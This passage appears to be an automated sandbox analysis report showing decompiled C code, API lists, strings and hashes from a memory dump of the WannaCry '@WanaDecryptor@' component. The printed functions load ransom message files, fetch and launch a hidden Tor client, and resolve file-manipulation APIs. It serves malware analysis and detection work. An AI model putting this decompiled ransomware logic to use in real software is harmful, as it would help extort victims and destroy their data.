				_t26 =  &_v284;
				_push(_t26);
				_v4 = 0;
				L00412DD6();
				_push("msg\\");
				L00412CAA();
				_push("m_%s.wnry");
				_push(_t26);
				_push( &_v288);
				_v12 = 1;
				L00412CCE();
				sprintf( &_v292,  *_t26, _v304);
				_t60 = _t58 - 0x110 + 0xc;
				L00412CC2();
				_v24 = 0;
				L00412CC2();
				_t30 = GetFileAttributesA( &_v292);
				if(_t30 == 0xffffffff) {
					_push("msg\\");
					L00412CAA();
					_push("m_%s.wnry");
					_push(_t30);
					_t32 =  &_v300;
					_v28 = 2;
					_push(_t32);
					L00412CCE();
					sprintf( &_v308,  *_t32, "English");
					_t60 = _t60 + 0xc;
					L00412CC2();
					_v40 = 0;
					L00412CC2();
				}
				_t31 = E00406CF0(_t56,  &_v292);
				_v28 = 0xffffffff;
				L00412CC2();
				 *[fs:0x0] = _v36;
				return _t31;
			}

APIs

#540.MFC42(?,755720C0), ref: 00406B03
#3874.MFC42 ref: 00406B1B
#537.MFC42(msg\), ref: 00406B29
#924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406B41
sprintf.MSVCRT ref: 00406B59
#800.MFC42(?,?,755720C0), ref: 00406B62
#800.MFC42 ref: 00406B73
GetFileAttributesA.KERNEL32(?), ref: 00406B7D
#537.MFC42(msg\), ref: 00406B91
#924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406BA9
sprintf.MSVCRT ref: 00406BBB
#800.MFC42(?,?,?,?,?,755720C0), ref: 00406BC4
#800.MFC42 ref: 00406BD5
#800.MFC42(?), ref: 00406BF5

Strings

msg\, xrefs: 00406B20, 00406B88
m_%s.wnry, xrefs: 00406B2E, 00406B96
English, xrefs: 00406BB0

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #800$#537#924sprintf$#3874#540AttributesFile
String ID: English$m_%s.wnry$msg\
API String ID: 3713669620-4206458537
Opcode ID: f36c2dcfbfc0b931c038135b008570d0ce4cdd6941e9a910e96e45ef17743a79
Instruction ID: 3ad7a17867ea9436e9d42ea8b12d154e8c58dea708134770199309aae3637b36
Opcode Fuzzy Hash: f36c2dcfbfc0b931c038135b008570d0ce4cdd6941e9a910e96e45ef17743a79
Instruction Fuzzy Hash: 4A316170108341AEC324EB25D941FDE77A4BBA8714F404E1EF59AC32D1EB789558CAA7

Uniqueness

Uniqueness Score: -1.00%

Function 0040B840 Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 138
synchronizationprocessfileCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040B840() {
				void _v519;
				char _v520;
				void _v1039;
				char _v1040;
				struct _STARTUPINFOA _v1108;
				struct _PROCESS_INFORMATION _v1124;
				char _t29;
				void* _t46;
				char _t47;
				void* _t55;
				void* _t56;
				void* _t84;
				void* _t86;

				_t29 =  *0x421798; // 0x0
				_v1040 = _t29;
				memset( &_v1039, 0, 0x81 << 2);
				asm("stosw");
				asm("stosb");
				sprintf( &_v1040, "%s\\%s\\%s", "TaskData", "Tor", "taskhsvc.exe");
				_t84 =  &_v1124 + 0x20;
				if(GetFileAttributesA( &_v1040) != 0xffffffff) {
					L8:
					_v1108.cb = 0x44;
					_v1124.hProcess = 0;
					memset( &(_v1108.lpReserved), 0, 0x10 << 2);
					_v1124.hThread = 0;
					_v1124.dwProcessId = 0;
					_v1124.dwThreadId = 0;
					_v1108.wShowWindow = 0;
					_v1108.dwFlags = 1;
					if(CreateProcessA(0,  &_v1040, 0, 0, 0, 0x8000000, 0, 0,  &_v1108,  &_v1124) != 0) {
						if(WaitForSingleObject(_v1124.hProcess, 0x1388) == 0x102) {
							WaitForSingleObject(_v1124.hProcess, 0x7530);
						}
						CloseHandle(_v1124);
						CloseHandle(_v1124.hThread);
						return 1;
					} else {
						return 0;
					}
				} else {
					_t46 = E0040B6A0("TaskData", 0x4220e4, 0);
					_t86 = _t84 + 0xc;
					if(_t46 != 0) {
						L5:
						_t47 =  *0x421798; // 0x0
						_v520 = _t47;
						memset( &_v519, 0, 0x81 << 2);
						asm("stosw");
						asm("stosb");
						sprintf( &_v520, "%s\\%s\\%s", "TaskData", "Tor", "tor.exe");
						_t84 = _t86 + 0x20;
						if(GetFileAttributesA( &_v520) != 0xffffffff) {
							CopyFileA( &_v520,  &_v1040, 0);
							goto L8;
						} else {
							return 0;
						}
					} else {
						_push(0);
						_t55 = E0040B780( &_v1040, "TaskData", 0x422148);
						_t86 = _t86 + 0xc;
						if(_t55 != 0) {
							goto L5;
						} else {
							_push(0);
							_t56 = E0040B780( &_v1040, "TaskData", 0x4221ac);
							_t86 = _t86 + 0xc;
							if(_t56 != 0) {
								goto L5;
							} else {
								return _t56;
							}
						}
					}
				}
			}

0x0040b846
0x0040b84d
0x0040b861
0x0040b863
0x0040b879
0x0040b87a
0x0040b885
0x0040b892
0x0040b95b
0x0040b966
0x0040b970
0x0040b974
0x0040b976
0x0040b982
0x0040b991
0x0040b995
0x0040b99f
0x0040b9b2
0x0040b9d6
0x0040b9e2
0x0040b9e2
0x0040b9ef
0x0040b9f6
0x0040ba02
0x0040b9b5
0x0040b9be
0x0040b9be
0x0040b898
0x0040b8a4
0x0040b8a9
0x0040b8ae
0x0040b8e9
0x0040b8e9
0x0040b8f3
0x0040b908
0x0040b90a
0x0040b923
0x0040b924
0x0040b929
0x0040b939
0x0040b955
0x00000000
0x0040b93c
0x0040b945
0x0040b945
0x0040b8b0
0x0040b8b0
0x0040b8bc
0x0040b8c1
0x0040b8c6
0x00000000
0x0040b8c8
0x0040b8c8
0x0040b8d4
0x0040b8d9
0x0040b8de
0x00000000
0x0040b8e8
0x0040b8e8
0x0040b8e8
0x0040b8de
0x0040b8c6
0x0040b8ae

APIs

sprintf.MSVCRT ref: 0040B87A
GetFileAttributesA.KERNEL32(?,?,?,?,00000000,?), ref: 0040B88D
CreateProcessA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9AA

Part of subcall function 0040B6A0: CreateDirectoryA.KERNEL32(?,00000000,?,757F3310,00000000,00000428), ref: 0040B6B4
Part of subcall function 0040B6A0: DeleteFileA.KERNEL32(?), ref: 0040B6D9

sprintf.MSVCRT ref: 0040B924
GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040B934

Part of subcall function 0040B780: CreateDirectoryA.KERNEL32(?,00000000,?,757F3310,00000428), ref: 0040B793
Part of subcall function 0040B780: GetTempFileNameA.KERNEL32(?,004214DC,00000000,?), ref: 0040B7D4
Part of subcall function 0040B780: DeleteUrlCacheEntry.WININET(?), ref: 0040B7DB
Part of subcall function 0040B780: URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0040B7ED
Part of subcall function 0040B780: DeleteFileA.KERNEL32(?), ref: 0040B815

CopyFileA.KERNEL32(?,?,00000000), ref: 0040B955
WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9CF
WaitForSingleObject.KERNEL32(?,00007530,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9E2
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,08000000), ref: 0040B9EF
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,08000000), ref: 0040B9F6

Part of subcall function 0040B780: DeleteFileA.KERNEL32(?), ref: 0040B82C

Strings

taskhsvc.exe, xrefs: 0040B85C
tor.exe, xrefs: 0040B903
Tor, xrefs: 0040B865, 0040B90C
TaskData, xrefs: 0040B86A, 0040B89F, 0040B8B7, 0040B8CF, 0040B911
D, xrefs: 0040B966
%s\%s\%s, xrefs: 0040B873, 0040B91D

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: File$Delete$Create$AttributesCloseDirectoryHandleObjectSingleWaitsprintf$CacheCopyDownloadEntryNameProcessTemp
String ID: %s\%s\%s$D$TaskData$Tor$taskhsvc.exe$tor.exe
API String ID: 4284242699-636499233
Opcode ID: 09006d51623bf6324b32cedefd723180e41c2e4a94ec42060d8d8d083510f0e4
Instruction ID: 35d80fb58dc1195f77b7b167f0129d00e9adf464e01d9889cd120ecf7352bd78
Opcode Fuzzy Hash: 09006d51623bf6324b32cedefd723180e41c2e4a94ec42060d8d8d083510f0e4
Instruction Fuzzy Hash: 0C4137716443007AD710DBA4EC41BEBB7D4AFE8700F90883FF698532E1D6B99548879E

Uniqueness

Uniqueness Score: -1.00%

Function 00402C40 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 72
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402C40() {
				_Unknown_base(*)()* _t11;
				struct HINSTANCE__* _t23;

				if(E00404B70() == 0) {
					L12:
					return 0;
				} else {
					if( *0x4217a0 == 0) {
						_t23 = LoadLibraryA("kernel32.dll");
						if(_t23 == 0) {
							goto L12;
						} else {
							 *0x4217a0 = GetProcAddress(_t23, "CreateFileW");
							 *0x4217a4 = GetProcAddress(_t23, "WriteFile");
							 *0x4217a8 = GetProcAddress(_t23, "ReadFile");
							 *0x4217ac = GetProcAddress(_t23, "MoveFileW");
							 *0x4217b0 = GetProcAddress(_t23, "MoveFileExW");
							 *0x4217b4 = GetProcAddress(_t23, "DeleteFileW");
							_t11 = GetProcAddress(_t23, "CloseHandle");
							 *0x4217b8 = _t11;
							if( *0x4217a0 == 0 ||  *0x4217a4 == 0 ||  *0x4217a8 == 0 ||  *0x4217ac == 0 ||  *0x4217b0 == 0 ||  *0x4217b4 == 0 || _t11 == 0) {
								goto L12;
							} else {
								return 1;
							}
						}
					} else {
						return 1;
					}
				}
			}

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 00402C63
GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00402C80
GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00402C8D
GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00402C9A
GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 00402CA7
GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 00402CB4
GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 00402CC1
GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00402CCE

Strings

kernel32.dll, xrefs: 00402C5E
CreateFileW, xrefs: 00402C7A
CloseHandle, xrefs: 00402CC3
MoveFileExW, xrefs: 00402CA9
MoveFileW, xrefs: 00402C9C
WriteFile, xrefs: 00402C82
DeleteFileW, xrefs: 00402CB6
ReadFile, xrefs: 00402C8F

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CloseHandle$CreateFileW$DeleteFileW$MoveFileExW$MoveFileW$ReadFile$WriteFile$kernel32.dll
API String ID: 2238633743-1294736154
Opcode ID: 468b1d099fd8a0684a95be66b91aae829347793d9c58d8a41e664e10bf98f029
Instruction ID: a2b5d8bb757b14b28e15fb80ad1863100e1319e91a413c2d323d0fcc62a15203
Opcode Fuzzy Hash: 468b1d099fd8a0684a95be66b91aae829347793d9c58d8a41e664e10bf98f029
Instruction Fuzzy Hash: AA110334B423216BD734AB25BD58FA72695EFD4701795003FA801E76E1D7B89C42CA5C

Uniqueness

Uniqueness Score: -1.00%

Function 00405580 Relevance: 27.2, APIs: 18, Instructions: 187
windowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00405580(void* __ecx) {
				int _v8;
				intOrPtr _v12;
				char _v28;
				char _v80;
				void* _v96;
				struct tagRECT _v112;
				signed int _v116;
				void* _v120;
				struct HDC__* _v140;
				long _v144;
				struct tagRECT _v160;
				char _v164;
				void* _v172;
				intOrPtr _v176;
				char _v188;
				int _v192;
				int _v196;
				int _v204;
				intOrPtr _v212;
				void* _v216;
				struct HBRUSH__* _v220;
				char _v224;
				intOrPtr _v228;
				void* _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				signed int _v256;
				void* _v260;
				void* _v264;
				void* _v268;
				int _v272;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				int _t78;
				long _t79;
				struct HBRUSH__* _t80;
				struct HDC__* _t84;
				char _t85;
				struct HBRUSH__* _t86;
				intOrPtr _t89;
				intOrPtr _t90;
				intOrPtr _t102;
				intOrPtr _t104;
				intOrPtr _t108;
				intOrPtr _t136;
				void* _t151;
				struct HBRUSH__* _t152;
				void* _t153;
				void* _t156;
				int _t160;
				intOrPtr _t162;

				_push(0xffffffff);
				_push(E00413943);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t162;
				_t156 = __ecx;
				_t78 = GetClientRect( *(__ecx + 0x20),  &_v112);
				_t160 = 0;
				_v204 = 0;
				_t108 =  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x44)) - 8));
				_v176 = _t108;
				if(_t108 != 0) {
					L00412DD0();
					_t79 =  *(_t156 + 0x50);
					_v8 = 0;
					_v164 = 0xffb53f;
					_v160.left = _t79;
					_v160.top = 0x674017;
					_v160.right =  *((intOrPtr*)(_t156 + 0x4c));
					_v160.bottom = 0;
					_v144 =  *(_t156 + 0x54);
					L00412E5A();
					_t80 =  *((intOrPtr*)(_t79 + 8));
					__imp__#8(_t80,  *((intOrPtr*)(_t156 + 0x58)), 0,  &_v164, 3, _t156, _t151);
					_t152 = _t80;
					_v220 = _t152;
					L00412E54();
					asm("sbb eax, eax");
					_v28 = 1;
					_t84 = CreateCompatibleDC( ~( &_v120) & _v116);
					_push(_t84);
					L00412E4E();
					_push(_t152);
					L00412DE2();
					if(_t84 != 0) {
						_t84 =  *(_t84 + 4);
					}
					_push(_t84);
					_t85 = _v224;
					_push(_t85);
					L00412E48();
					_v212 = _t85;
					_t153 = 0;
					_v252 = 1;
					_t86 = CreateSolidBrush( *(_t156 + 0x54));
					_v220 = _t86;
					FillRect(_v140,  &_v160, _t86);
					_t89 = 0;
					_v260 = 0;
					if(_t108 > 0) {
						do {
							_v224 =  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x44)) + _t89));
							E00405110(_t156,  &_v188, _v224);
							asm("sbb eax, eax");
							BitBlt(_v160, _t160, _v272,  *((intOrPtr*)(_t156 + 0x60)) +  *((intOrPtr*)(_t156 + 0x68)),  *((intOrPtr*)(_t156 + 0x64)) +  *((intOrPtr*)(_t156 + 0x6c)),  ~( &_v260) & _v256, _v196, _v192, 0xcc0020);
							_t102 =  *((intOrPtr*)(_t156 + 0x74));
							_t160 = _t160 +  *((intOrPtr*)(_t156 + 0x60)) +  *((intOrPtr*)(_t156 + 0x68));
							_t153 = _t153 + 1;
							if(_t153 != _t102) {
								goto L10;
							} else {
								_t136 =  *((intOrPtr*)(_t156 + 0x70));
								if(_t136 != 1) {
									if(_t153 != _t102) {
										goto L10;
									} else {
										_t104 = _t136;
										if(_t104 <= 1) {
											goto L10;
										} else {
											if(_v304 != _t104) {
												_t153 = 0;
												_t160 = 0;
												_v300 = _v300 +  *((intOrPtr*)(_t156 + 0x64)) +  *((intOrPtr*)(_t156 + 0x6c));
												_v304 = _v304 + 1;
												goto L10;
											}
										}
									}
								}
							}
							goto L11;
							L10:
							_t89 = _v296 + 1;
							_v296 = _t89;
						} while (_t89 < _v272);
					}
					L11:
					_t90 = _v228;
					if(_t90 != 0) {
						_t90 =  *((intOrPtr*)(_t90 + 4));
					}
					_push(_t90);
					_push(_v248);
					L00412E48();
					L00412E42();
					DeleteObject(_v264);
					_t78 = DeleteObject(_v244);
					_v80 = 0;
					L00412E3C();
					_v80 = 0xffffffff;
					L00412DB8();
				}
				 *[fs:0x0] = _v12;
				return _t78;
			}

APIs

GetClientRect.USER32(?,?), ref: 004055A9
#470.MFC42 ref: 004055D0
#1168.MFC42 ref: 00405605
#8.COMCTL32(?,?,00000000,00FFB53F,00000003), ref: 0040561A
#323.MFC42 ref: 0040562A
CreateCompatibleDC.GDI32(?), ref: 0040564C
#1640.MFC42(00000000), ref: 00405657
#2860.MFC42(00000000,00000000), ref: 0040565D
#5785.MFC42(?,00000000,00000000,00000000), ref: 0040566F
CreateSolidBrush.GDI32(?), ref: 00405686
FillRect.USER32(?,?,00000000), ref: 0040569E
BitBlt.GDI32(?,00000000,?,?,?,?,?,?,00CC0020), ref: 0040570B
#5785.MFC42(?,?), ref: 00405782
#2405.MFC42(?,?), ref: 0040578B
DeleteObject.GDI32(?), ref: 0040579B
DeleteObject.GDI32(?), ref: 004057A2
#640.MFC42 ref: 004057B0
#755.MFC42 ref: 004057C4

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #5785CreateDeleteObjectRect$#1168#1640#2405#2860#323#470#640#755BrushClientCompatibleFillSolid
String ID:
API String ID: 1233696098-0
Opcode ID: 3787f29b2f3b6759b14921245bb0c5350f6533f71f74a9e78965702df0d7f065
Instruction ID: b627e9c1237585dd637a27707791d59f98fdace04f8481d3914a5fbe5096edf5
Opcode Fuzzy Hash: 3787f29b2f3b6759b14921245bb0c5350f6533f71f74a9e78965702df0d7f065
Instruction Fuzzy Hash: 057135716087419FC324DF69C984AABB7E9FB88704F004A2EF59AC3350DB74E845CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00408D70 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 257
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00408D70(intOrPtr __ecx, signed long long __fp0, intOrPtr* _a4, int _a8, signed int _a12, unsigned int _a16, signed int _a20) {
				intOrPtr _v0;
				unsigned int _v4;
				unsigned int _v8;
				unsigned int _v12;
				intOrPtr _v20;
				char _v36;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v64;
				char _v68;
				unsigned int _v72;
				signed int _v76;
				signed int _v80;
				intOrPtr _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed long long _v100;
				intOrPtr _v104;
				void* _v108;
				void* _v112;
				void* _v120;
				unsigned int _t93;
				signed int _t96;
				signed int _t100;
				unsigned int _t102;
				signed int _t107;
				int _t112;
				char _t113;
				signed char _t115;
				RECT* _t122;
				signed int _t125;
				signed int _t134;
				intOrPtr* _t135;
				unsigned int _t138;
				signed int _t140;
				signed int _t143;
				intOrPtr* _t146;
				char _t151;
				char _t152;
				signed int _t169;
				intOrPtr* _t177;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t195;
				unsigned int _t202;
				char _t209;
				intOrPtr _t210;
				signed long long _t228;
				signed long long _t229;
				signed long long _t230;
				signed long long _t231;
				signed long long _t234;

				_t228 = __fp0;
				_push(0xffffffff);
				_push(E004140A0);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t210;
				_t93 = _a20;
				_v104 = __ecx;
				_t138 = _a16;
				_t169 = _t138 & 0x000000ff;
				_v76 = _t169;
				_t192 = (_t93 & 0x000000ff) - _t169;
				_t140 = _t138 >> 0x00000010 & 0x000000ff;
				_t96 = (_t93 >> 0x00000010 & 0x000000ff) - _t140;
				_v88 = 0;
				_v96 = _t96;
				_v92 = _t140;
				asm("cdq");
				_t143 = _t96 ^ 0;
				_v100 = 0;
				asm("cdq");
				_a20 = _t192;
				_t134 = 0;
				if(0 <= _t143) {
					_t134 = _t143;
				}
				asm("cdq");
				_t100 = _t192 ^ 0;
				if(_t100 <= _t134) {
					_a16 = 0;
					if(0 <= _t143) {
						_a16 = _t143;
					}
				} else {
					_a16 = _t100;
				}
				_t193 = _a8;
				_t102 =  *((intOrPtr*)(_t193 + 8)) -  *_t193;
				if(_t102 < _a16) {
					_a16 = _t102;
				}
				if(_a16 == 0) {
					_a16 = 1;
				}
				asm("fild dword [esp+0x88]");
				asm("fild dword [esp+0x8c]");
				_t135 = _a4;
				_t229 = _t228 / st1;
				_v80 = _t229;
				asm("fild dword [esp+0x1c]");
				_t230 = _t229 / st1;
				_v100 = _t230;
				asm("fild dword [esp+0x20]");
				_t231 = _t230 / st1;
				_v96 = _t231;
				st0 = _t231;
				_t107 = GetDeviceCaps( *( *_t135 + 8), 0x26) & 0x00000100;
				_v80 = _t107;
				if(_t107 == 0 && _a8 > 1) {
					_t125 = GetDeviceCaps( *( *_t135 + 8), 0xc);
					if(GetDeviceCaps( *( *_t135 + 8), 0xe) * _t125 < 8) {
						_v8 = 1;
					}
				}
				_t146 = _t193;
				_a12 =  *((intOrPtr*)(_t193 + 8)) -  *_t193;
				_t202 = 0;
				asm("fild dword [esp+0x8c]");
				_v72 = 0;
				_v68 =  *_t146;
				_v76 = 0x415a44;
				asm("fidiv dword [esp+0x88]");
				_v64 =  *((intOrPtr*)(_t146 + 4));
				_v60 =  *((intOrPtr*)(_t146 + 8));
				_v56 =  *((intOrPtr*)(_t146 + 0xc));
				_a12 = _t231;
				_t112 = _a8;
				_v12 = 0;
				_v4 = 0;
				if(_t112 <= 0) {
					L31:
					_v76 = 0x415c00;
					_v12 = 1;
					L00412D52();
					 *[fs:0x0] = _v20;
					return _t112;
				} else {
					while(1) {
						asm("fild dword [esp+0x7c]");
						_t195 =  *_t193;
						L0041304A();
						_t46 = _t202 + 1; // 0x1
						_v4 = _t46;
						_t209 = _t112 + _t195;
						asm("fild dword [esp+0x7c]");
						_v68 = _t209;
						_t234 = st0 * _a12 * _a12;
						L0041304A();
						_t113 = _t112 + _t195;
						_v60 = _t113;
						if(_t202 == _a8 - 1) {
							_t113 =  *((intOrPtr*)(_v0 + 8));
							_v60 = _t113;
						}
						_t177 = _a4;
						_t151 =  *_t177;
						if(_t113 < _t151) {
							goto L29;
						}
						if(_t209 < _t151) {
							_v68 = _t151;
						}
						_t152 =  *((intOrPtr*)(_t177 + 8));
						if(_t113 > _t152) {
							_v60 = _t152;
						}
						L0041304A();
						_v92 = 0;
						L0041304A();
						_t115 = _t113 + _v100 + _v96;
						_v92 = _t115 << 8;
						L0041304A();
						_push(_t115 + _v84 & 0x000000ff | _v92);
						if(_v80 == 0) {
							_t112 = E00409D40( &_v36, _t135,  &_v68);
							_push(_t112);
							L00412FF2();
						} else {
							_push(CreateSolidBrush());
							L00412D5E();
							_t122 = E00409D40( &_v60, _t135,  &_v76);
							_t76 =  &_v96; // 0x415a44
							asm("sbb ecx, ecx");
							_t112 = FillRect( *( *_t135 + 4), _t122,  ~_t76 & _v92);
							L00412D52();
						}
						if(_v68 <  *((intOrPtr*)(_v4 + 8))) {
							L30:
							_t202 = _v4;
							_t112 = _a8;
							_v4 = _t202;
							if(_t202 < _t112) {
								_t193 = _v0;
								continue;
							}
						}
						goto L31;
						L29:
						st0 = _t234;
						goto L30;
					}
				}
			}

APIs

GetDeviceCaps.GDI32(?,00000026), ref: 00408EA3
GetDeviceCaps.GDI32(?,0000000C), ref: 00408EC2
GetDeviceCaps.GDI32(?,0000000E), ref: 00408ECE
_ftol.MSVCRT ref: 00408F60
_ftol.MSVCRT ref: 00408F7F
_ftol.MSVCRT ref: 00408FD0
_ftol.MSVCRT ref: 00408FE9
_ftol.MSVCRT ref: 00409005
CreateSolidBrush.GDI32(00000000), ref: 00409024
#1641.MFC42(00000000), ref: 0040902F
FillRect.USER32(?,00000000,DZA), ref: 0040905E
#2414.MFC42 ref: 00409068
#2754.MFC42(00000000,?,?,?,00000000), ref: 00409086
#2414.MFC42 ref: 004090CA

Strings

DZA, xrefs: 0040904E, 00409058

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: _ftol$CapsDevice$#2414$#1641#2754BrushCreateFillRectSolid
String ID: DZA
API String ID: 2487345631-3378329814
Opcode ID: 46f8ac59b565287c612820a18e91b1c7afa6038287a955736cfc91f47d65fae1
Instruction ID: dda82c2241e8f2351b86cfb5efeedf8da928c70a362fdc9ee550b763b14e0e54
Opcode Fuzzy Hash: 46f8ac59b565287c612820a18e91b1c7afa6038287a955736cfc91f47d65fae1
Instruction Fuzzy Hash: 2CA147716087418FC324DF25C984AAABBE1FFC8704F148A2EF599D7291DA39D845CF86

Uniqueness

Uniqueness Score: -1.00%

Function 00401600 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 120
windowCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00401600(void* __ecx, intOrPtr _a4, long _a8, intOrPtr _a12) {
				void* _t19;
				long _t21;
				long _t24;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				long _t48;
				void* _t49;
				intOrPtr _t50;

				_t27 = _a4;
				_t48 = _a8;
				_t19 = _t27 - 0x4e20;
				_t49 = __ecx;
				if(_t19 == 0) {
					if(_t48 != 0) {
						if(_t48 == 0xffffffff) {
							goto L14;
						}
						goto L15;
					} else {
						_push(__ecx);
						_a4 = _t50;
						L00412CAA();
						E00401970("Connected");
						_t21 = SendMessageA( *(_t49 + 0x80), 0x402, 0x1e, _t48);
						_push(_a4);
						_push(_t48);
						_push(_t27);
						 *(_t49 + 0xb0) = 0x23;
						L00412BAE();
						return _t21;
					}
				} else {
					_t19 = _t19 - 1;
					if(_t19 == 0) {
						if(_t48 != 0) {
							goto L9;
						} else {
							_push(__ecx);
							_a4 = _t50;
							L00412CAA();
							E00401970("Sent request");
							_t24 = SendMessageA( *(_t49 + 0x80), 0x402, 0x23, _t48);
							_push(_a4);
							_push(_t48);
							_push(_t27);
							 *(_t49 + 0xb0) = 0x28;
							L00412BAE();
							return _t24;
						}
					} else {
						_t19 = _t19 - 1;
						if(_t19 != 0) {
							L15:
							_push(_a12);
							_push(_t48);
							_push(_t27);
							L00412BAE();
							return _t19;
						} else {
							if(_t48 != 0) {
								if(_t48 != 1) {
									L9:
									if(_t48 == 0xffffffff) {
										L14:
										 *((intOrPtr*)(_t49 + 0xa8)) = 0xffffffff;
									}
									goto L15;
								} else {
									_push(__ecx);
									_a4 = _t50;
									L00412CAA();
									_t25 = E00401970("Succeed");
									_push(_a4);
									_push(_t48);
									_push(_t27);
									L00412BAE();
									return _t25;
								}
							} else {
								_push(__ecx);
								_a4 = _t50;
								L00412CAA();
								_t26 = E00401970("Received response");
								_push(_a4);
								_push(_t48);
								_push(_t27);
								 *((intOrPtr*)(_t49 + 0xa8)) = 1;
								L00412BAE();
								return _t26;
							}
						}
					}
				}
			}

APIs

#2385.MFC42 ref: 00401653
#537.MFC42(Received response), ref: 00401634

